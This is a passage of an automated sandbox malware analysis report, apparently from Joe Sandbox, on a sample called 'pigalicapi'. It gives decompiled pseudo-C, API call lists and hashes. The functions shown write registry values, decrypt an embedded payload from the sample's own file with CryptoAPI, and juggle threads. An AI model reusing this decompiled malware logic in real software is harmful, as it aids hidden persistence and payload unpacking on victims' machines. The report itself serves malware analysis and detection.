                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,04013FE2), ref: 04005F7A
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,04003C58,00000000,000F003F,00000000), ref: 04005FB3
                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 04005FF2
                                                                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 0400603B
                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 04006045
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Value$CloseOpenQuerylstrcatlstrcpy
                                                                                                                                                                                                                                                                          • String ID: $ $pigalicapi
                                                                                                                                                                                                                                                                          • API String ID: 764223185-550099112
                                                                                                                                                                                                                                                                          • Opcode ID: 423ae5761b421ea40ff2c1466760ba86f39da5aff24a2289ecb93b8c70e41592
                                                                                                                                                                                                                                                                          • Instruction ID: d868066335aa3bc34e1d01a835705104c70e08da6b50357c6a08ba3ec109f492
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 423ae5761b421ea40ff2c1466760ba86f39da5aff24a2289ecb93b8c70e41592
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F3143B194021CABEB14CF90DC45FFEB7B8EB08704F048598EB04B6181D7B96A85CF60
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04004096() {
                                                                                                                                                                                                                                                                          				void _t92;
                                                                                                                                                                                                                                                                          				void* _t114;
                                                                                                                                                                                                                                                                          				void* _t161;
                                                                                                                                                                                                                                                                          				void* _t163;
                                                                                                                                                                                                                                                                          				void* _t166;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				L0:
                                                                                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                                                                                          					L0:
                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t161 - 0x38)) =  *((intOrPtr*)(_t161 - 0x38)) + 1;
                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t161 - 0x38)) >=  *((intOrPtr*)(_t161 + 0x14))) {
                                                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					L2:
                                                                                                                                                                                                                                                                          					EnterCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                          					if( *(_t161 - 0x30) != 0) {
                                                                                                                                                                                                                                                                          						VirtualFree( *(_t161 - 0x30), 0, 0x8000);
                                                                                                                                                                                                                                                                          						 *(_t161 - 0x30) = 0;
                                                                                                                                                                                                                                                                          						 *(_t161 - 0x2c) = 0;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t171 =  *(_t161 - 0x34);
                                                                                                                                                                                                                                                                          					if( *(_t161 - 0x34) != 0) {
                                                                                                                                                                                                                                                                          						TerminateThread( *(_t161 - 0x34), 0);
                                                                                                                                                                                                                                                                          						 *(_t161 - 0x34) = 0;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					ResetEvent( *(_t161 - 0x10));
                                                                                                                                                                                                                                                                          					LeaveCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                          					_t92 = CreateThread(0, 0, E04004AC0, _t161 - 0x34, 0, 0); // executed
                                                                                                                                                                                                                                                                          					 *(_t161 - 0x34) = _t92;
                                                                                                                                                                                                                                                                          					 *(_t161 - 0x64) = E040097A0( ~(0 | _t171 > 0x00000000) |  *(_t161 + 0x18) * 0x00000004);
                                                                                                                                                                                                                                                                          					 *(_t161 - 0x3c) =  *(_t161 - 0x64);
                                                                                                                                                                                                                                                                          					E04007D20( *(_t161 - 0x64),  *(_t161 - 0x3c), 0,  *(_t161 + 0x18) << 2);
                                                                                                                                                                                                                                                                          					_t166 = _t163 + 0x10;
                                                                                                                                                                                                                                                                          					 *(_t161 - 0x60) = 0;
                                                                                                                                                                                                                                                                          					L8:
                                                                                                                                                                                                                                                                          					while( *(_t161 - 0x60) <  *(_t161 + 0x18)) {
                                                                                                                                                                                                                                                                          						( *(_t161 - 0x3c))[ *(_t161 - 0x60)] = 0;
                                                                                                                                                                                                                                                                          						E04007D20( *(_t161 - 0x3c), _t161 - 0x58, 0, 0x1c);
                                                                                                                                                                                                                                                                          						_t166 = _t166 + 0xc;
                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t161 - 0x40)) = _t161 - 0x34;
                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t161 - 0x44)) =  *((intOrPtr*)(_t161 + 0x10));
                                                                                                                                                                                                                                                                          						 *(_t161 - 0x58) =  *(_t161 + 8);
                                                                                                                                                                                                                                                                          						 *(_t161 - 0x50) =  *(_t161 - 0x60) *  *(_t161 - 8);
                                                                                                                                                                                                                                                                          						if( *(_t161 - 0x60) >=  *(_t161 + 0x18) - 1) {
                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t161 - 0x4c)) =  *((intOrPtr*)(_t161 + 0xc)) - 1;
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t161 - 0x4c)) =  *(_t161 - 0x50) +  *(_t161 - 8) - 1;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						 *(_t161 - 0x48) = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                          						_t114 = CreateThread(0, 0, E04004BA0, _t161 - 0x58, 0, 0); // executed
                                                                                                                                                                                                                                                                          						( *(_t161 - 0x3c))[ *(_t161 - 0x60)] = _t114;
                                                                                                                                                                                                                                                                          						WaitForSingleObject( *(_t161 - 0x48), 0xffffffff);
                                                                                                                                                                                                                                                                          						FindCloseChangeNotification( *(_t161 - 0x48)); // executed
                                                                                                                                                                                                                                                                          						 *(_t161 - 0x60) =  *(_t161 - 0x60) + 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					WaitForMultipleObjects( *(_t161 + 0x18),  *(_t161 - 0x3c), 1, 0xffffffff);
                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t161 - 0x5c)) = WaitForSingleObject( *(_t161 - 0x10), 0x2710);
                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t161 - 0x5c)) == 0) {
                                                                                                                                                                                                                                                                          						 *(_t161 - 1) = 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t161 - 0x5c)) = WaitForSingleObject( *(_t161 - 0x34), 0x3e8);
                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t161 - 0x5c)) != 0) {
                                                                                                                                                                                                                                                                          						TerminateThread( *(_t161 - 0x34), 0);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					L17:
                                                                                                                                                                                                                                                                          					EnterCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                          					if( *(_t161 - 0x30) != 0) {
                                                                                                                                                                                                                                                                          						VirtualFree( *(_t161 - 0x30), 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          						 *(_t161 - 0x30) = 0;
                                                                                                                                                                                                                                                                          						 *(_t161 - 0x2c) = 0;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					L19:
                                                                                                                                                                                                                                                                          					LeaveCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                          					 *(_t161 - 0x68) =  *(_t161 - 0x3c);
                                                                                                                                                                                                                                                                          					E040097C0( *(_t161 - 0x68));
                                                                                                                                                                                                                                                                          					if(( *(_t161 - 1) & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          						L21:
                                                                                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					break;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				L22:
                                                                                                                                                                                                                                                                          				DeleteCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                          				return  *(_t161 - 1);
                                                                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                                                                          0x04004096
                                                                                                                                                                                                                                                                          0x04004096
                                                                                                                                                                                                                                                                          0x04004096
                                                                                                                                                                                                                                                                          0x0400409c
                                                                                                                                                                                                                                                                          0x040040a5
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040040ab
                                                                                                                                                                                                                                                                          0x040040af
                                                                                                                                                                                                                                                                          0x040040b9
                                                                                                                                                                                                                                                                          0x040040c6
                                                                                                                                                                                                                                                                          0x040040cc
                                                                                                                                                                                                                                                                          0x040040d3
                                                                                                                                                                                                                                                                          0x040040d3
                                                                                                                                                                                                                                                                          0x040040da
                                                                                                                                                                                                                                                                          0x040040de
                                                                                                                                                                                                                                                                          0x040040e6
                                                                                                                                                                                                                                                                          0x040040ec
                                                                                                                                                                                                                                                                          0x040040ec
                                                                                                                                                                                                                                                                          0x040040f7
                                                                                                                                                                                                                                                                          0x04004101
                                                                                                                                                                                                                                                                          0x04004118
                                                                                                                                                                                                                                                                          0x0400411e
                                                                                                                                                                                                                                                                          0x0400413d
                                                                                                                                                                                                                                                                          0x04004143
                                                                                                                                                                                                                                                                          0x04004153
                                                                                                                                                                                                                                                                          0x04004158
                                                                                                                                                                                                                                                                          0x0400415b
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400416d
                                                                                                                                                                                                                                                                          0x0400417f
                                                                                                                                                                                                                                                                          0x0400418e
                                                                                                                                                                                                                                                                          0x04004193
                                                                                                                                                                                                                                                                          0x04004199
                                                                                                                                                                                                                                                                          0x0400419f
                                                                                                                                                                                                                                                                          0x040041a5
                                                                                                                                                                                                                                                                          0x040041af
                                                                                                                                                                                                                                                                          0x040041bb
                                                                                                                                                                                                                                                                          0x040041d2
                                                                                                                                                                                                                                                                          0x040041bd
                                                                                                                                                                                                                                                                          0x040041c7
                                                                                                                                                                                                                                                                          0x040041c7
                                                                                                                                                                                                                                                                          0x040041e3
                                                                                                                                                                                                                                                                          0x040041f7
                                                                                                                                                                                                                                                                          0x04004203
                                                                                                                                                                                                                                                                          0x0400420c
                                                                                                                                                                                                                                                                          0x04004216
                                                                                                                                                                                                                                                                          0x0400416a
                                                                                                                                                                                                                                                                          0x0400416a
                                                                                                                                                                                                                                                                          0x0400422d
                                                                                                                                                                                                                                                                          0x04004242
                                                                                                                                                                                                                                                                          0x04004249
                                                                                                                                                                                                                                                                          0x0400424b
                                                                                                                                                                                                                                                                          0x0400424b
                                                                                                                                                                                                                                                                          0x0400425e
                                                                                                                                                                                                                                                                          0x04004265
                                                                                                                                                                                                                                                                          0x0400426d
                                                                                                                                                                                                                                                                          0x0400426d
                                                                                                                                                                                                                                                                          0x04004273
                                                                                                                                                                                                                                                                          0x04004277
                                                                                                                                                                                                                                                                          0x04004281
                                                                                                                                                                                                                                                                          0x0400428e
                                                                                                                                                                                                                                                                          0x04004294
                                                                                                                                                                                                                                                                          0x0400429b
                                                                                                                                                                                                                                                                          0x0400429b
                                                                                                                                                                                                                                                                          0x040042a2
                                                                                                                                                                                                                                                                          0x040042a6
                                                                                                                                                                                                                                                                          0x040042af
                                                                                                                                                                                                                                                                          0x040042b6
                                                                                                                                                                                                                                                                          0x040042c4
                                                                                                                                                                                                                                                                          0x040042c8
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040042c8
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040042c4
                                                                                                                                                                                                                                                                          0x040042cd
                                                                                                                                                                                                                                                                          0x040042d1
                                                                                                                                                                                                                                                                          0x040042dd

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?), ref: 040040AF
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040040C6
                                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 040040E6
                                                                                                                                                                                                                                                                          • ResetEvent.KERNEL32(00000000), ref: 040040F7
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 04004101
                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 04004118
                                                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 040041DD
                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 040041F7
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0400420C
                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(?), ref: 04004216
                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?), ref: 040042D1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CreateCriticalSectionThread$Event$ChangeCloseDeleteEnterFindFreeLeaveNotificationObjectResetSingleTerminateVirtualWait
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 371823443-0
                                                                                                                                                                                                                                                                          • Opcode ID: 580c7b9ddcd011ba509f7f8c1de4a743a931a1a6ddda21c3e831cc7138ee1551
                                                                                                                                                                                                                                                                          • Instruction ID: 702011c11570e1e92260a3d6b56584955ffb64453fe6a6bb8e3d44d087611259
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 580c7b9ddcd011ba509f7f8c1de4a743a931a1a6ddda21c3e831cc7138ee1551
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E51D7B5A40308AFEB18DF94D899BDDBBB1FB48704F108219F605BB2C0D774A940CB54
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04004510(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                          				char _v780;
                                                                                                                                                                                                                                                                          				void* _v784;
                                                                                                                                                                                                                                                                          				char _v1308;
                                                                                                                                                                                                                                                                          				long _v1312;
                                                                                                                                                                                                                                                                          				void* _v1316;
                                                                                                                                                                                                                                                                          				long _v1320;
                                                                                                                                                                                                                                                                          				intOrPtr _v1324;
                                                                                                                                                                                                                                                                          				intOrPtr _v1328;
                                                                                                                                                                                                                                                                          				signed int _v1332;
                                                                                                                                                                                                                                                                          				intOrPtr _v1336;
                                                                                                                                                                                                                                                                          				intOrPtr _v1340;
                                                                                                                                                                                                                                                                          				intOrPtr _v1344;
                                                                                                                                                                                                                                                                          				void* _t90;
                                                                                                                                                                                                                                                                          				void* _t94;
                                                                                                                                                                                                                                                                          				int _t97;
                                                                                                                                                                                                                                                                          				signed char _t101;
                                                                                                                                                                                                                                                                          				signed char _t114;
                                                                                                                                                                                                                                                                          				void* _t153;
                                                                                                                                                                                                                                                                          				void* _t155;
                                                                                                                                                                                                                                                                          				void* _t156;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                          					L24:
                                                                                                                                                                                                                                                                          					return _v5;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					E04007D20(E04007D20( &_v780,  &_v780, 0, 0x300),  &_v1308, 0, 0x208);
                                                                                                                                                                                                                                                                          					_t155 = _t153 + 0x18;
                                                                                                                                                                                                                                                                          					GetModuleFileNameA(0,  &_v1308, 0x208);
                                                                                                                                                                                                                                                                          					_t90 = CreateFileA( &_v1308, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                                          					_v784 = _t90;
                                                                                                                                                                                                                                                                          					if(_v784 == 0xffffffff) {
                                                                                                                                                                                                                                                                          						goto L24;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v1312 = GetFileSize(_v784, 0);
                                                                                                                                                                                                                                                                          					if(_v1312 == 0) {
                                                                                                                                                                                                                                                                          						L22:
                                                                                                                                                                                                                                                                          						if(_v784 != 0) {
                                                                                                                                                                                                                                                                          							CloseHandle(_v784);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						goto L24;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t94 = VirtualAlloc(0, _v1312, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          					_v1316 = _t94;
                                                                                                                                                                                                                                                                          					if(_v1316 == 0) {
                                                                                                                                                                                                                                                                          						goto L22;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v1320 = 0;
                                                                                                                                                                                                                                                                          					_t97 = ReadFile(_v784, _v1316, _v1312,  &_v1320, 0); // executed
                                                                                                                                                                                                                                                                          					if(_t97 == 0 || _v1320 != _v1312) {
                                                                                                                                                                                                                                                                          						L20:
                                                                                                                                                                                                                                                                          						if(_v1316 != 0) {
                                                                                                                                                                                                                                                                          							VirtualFree(_v1316, 0, 0x8000);
                                                                                                                                                                                                                                                                          							_v1316 = 0;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						goto L22;
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						FindCloseChangeNotification(_v784); // executed
                                                                                                                                                                                                                                                                          						_v784 = 0;
                                                                                                                                                                                                                                                                          						_t101 = E040047F0(_v1316, _v1312, _a8); // executed
                                                                                                                                                                                                                                                                          						_t156 = _t155 + 0xc;
                                                                                                                                                                                                                                                                          						if((_t101 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          							if(_v1316 != 0) {
                                                                                                                                                                                                                                                                          								VirtualFree(_v1316, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          								_v1316 = 0;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v1328 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                                                                                                                                                                                          							_v1324 = _v1328 + ( *(_v1328 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                          							_v1332 = 0;
                                                                                                                                                                                                                                                                          							while(_v1332 < ( *(_v1328 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                          								_v1336 =  *((intOrPtr*)(_v1324 + 0xc + _v1332 * 0x28)) + _a4;
                                                                                                                                                                                                                                                                          								if( *((intOrPtr*)(_v1324 + 8 + _v1332 * 0x28)) <=  *((intOrPtr*)(_v1324 + 0x10 + _v1332 * 0x28))) {
                                                                                                                                                                                                                                                                          									_v1344 =  *((intOrPtr*)(_v1324 + 0x10 + _v1332 * 0x28));
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									_v1344 =  *((intOrPtr*)(_v1324 + 8 + _v1332 * 0x28));
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v1340 = _v1344;
                                                                                                                                                                                                                                                                          								_t114 = E040047F0(_v1336, _v1340, _a8); // executed
                                                                                                                                                                                                                                                                          								_t156 = _t156 + 0xc;
                                                                                                                                                                                                                                                                          								if((_t114 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          									_v1332 = _v1332 + 1;
                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									_v5 = 1;
                                                                                                                                                                                                                                                                          									goto L20;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							goto L20;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v5 = 1;
                                                                                                                                                                                                                                                                          						goto L20;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}
























                                                                                                                                                                                                                                                                          0x0400451a
                                                                                                                                                                                                                                                                          0x04004522
                                                                                                                                                                                                                                                                          0x040047e6
                                                                                                                                                                                                                                                                          0x040047ed
                                                                                                                                                                                                                                                                          0x04004532
                                                                                                                                                                                                                                                                          0x04004556
                                                                                                                                                                                                                                                                          0x0400455b
                                                                                                                                                                                                                                                                          0x0400456c
                                                                                                                                                                                                                                                                          0x0400458b
                                                                                                                                                                                                                                                                          0x04004591
                                                                                                                                                                                                                                                                          0x0400459e
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040045b3
                                                                                                                                                                                                                                                                          0x040045c0
                                                                                                                                                                                                                                                                          0x040047d0
                                                                                                                                                                                                                                                                          0x040047d7
                                                                                                                                                                                                                                                                          0x040047e0
                                                                                                                                                                                                                                                                          0x040047e0
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040047d7
                                                                                                                                                                                                                                                                          0x040045d6
                                                                                                                                                                                                                                                                          0x040045dc
                                                                                                                                                                                                                                                                          0x040045e9
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040045ef
                                                                                                                                                                                                                                                                          0x04004617
                                                                                                                                                                                                                                                                          0x0400461f
                                                                                                                                                                                                                                                                          0x040047a9
                                                                                                                                                                                                                                                                          0x040047b0
                                                                                                                                                                                                                                                                          0x040047c0
                                                                                                                                                                                                                                                                          0x040047c6
                                                                                                                                                                                                                                                                          0x040047c6
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04004637
                                                                                                                                                                                                                                                                          0x0400463e
                                                                                                                                                                                                                                                                          0x04004644
                                                                                                                                                                                                                                                                          0x04004660
                                                                                                                                                                                                                                                                          0x04004665
                                                                                                                                                                                                                                                                          0x0400466d
                                                                                                                                                                                                                                                                          0x0400467f
                                                                                                                                                                                                                                                                          0x0400468f
                                                                                                                                                                                                                                                                          0x04004695
                                                                                                                                                                                                                                                                          0x04004695
                                                                                                                                                                                                                                                                          0x040046a8
                                                                                                                                                                                                                                                                          0x040046c2
                                                                                                                                                                                                                                                                          0x040046c8
                                                                                                                                                                                                                                                                          0x040046e3
                                                                                                                                                                                                                                                                          0x0400470f
                                                                                                                                                                                                                                                                          0x0400473b
                                                                                                                                                                                                                                                                          0x0400476b
                                                                                                                                                                                                                                                                          0x0400473d
                                                                                                                                                                                                                                                                          0x04004750
                                                                                                                                                                                                                                                                          0x04004750
                                                                                                                                                                                                                                                                          0x04004777
                                                                                                                                                                                                                                                                          0x0400478f
                                                                                                                                                                                                                                                                          0x04004794
                                                                                                                                                                                                                                                                          0x0400479c
                                                                                                                                                                                                                                                                          0x040046dd
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400479e
                                                                                                                                                                                                                                                                          0x0400479e
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400479e
                                                                                                                                                                                                                                                                          0x0400479c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040046e3
                                                                                                                                                                                                                                                                          0x0400466f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400466f
                                                                                                                                                                                                                                                                          0x0400461f

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 0400456C
                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0400458B
                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 040045AD
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 040045D6
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 04004617
                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(000000FF), ref: 0400463E
                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 0400482A
                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: GetLastError.KERNEL32 ref: 04004834
                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04004850
                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 040048EB
                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 0400490B
                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 0400493C
                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 0400496F
                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptDestroyKey.ADVAPI32(00000000), ref: 04004982
                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0400468F
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040047C0
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 040047E0
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$File$Virtual$AcquireCloseContextCreateFreeHash$AllocChangeDataDecryptDeriveDestroyErrorFindHandleLastModuleNameNotificationReadSize
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2585753175-0
                                                                                                                                                                                                                                                                          • Opcode ID: 41b532c3e78661638157de6fb4dddf30e3a22c3d81890ac6d0c72b3463451886
                                                                                                                                                                                                                                                                          • Instruction ID: c94ea80790bf0b6d8dbf2583483555f7aa9864fa89971da120b97b62dce4532c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41b532c3e78661638157de6fb4dddf30e3a22c3d81890ac6d0c72b3463451886
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92815D74A056189BEB64CF14DC94BAAB7B4AF49306F0091D9E608BB2C1D774ABC1CF54
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                                                                                                          			E04009D20(intOrPtr _a4, CHAR* _a8, int _a12) {
                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				char _v292;
                                                                                                                                                                                                                                                                          				intOrPtr _v296;
                                                                                                                                                                                                                                                                          				char _v404;
                                                                                                                                                                                                                                                                          				long _v408;
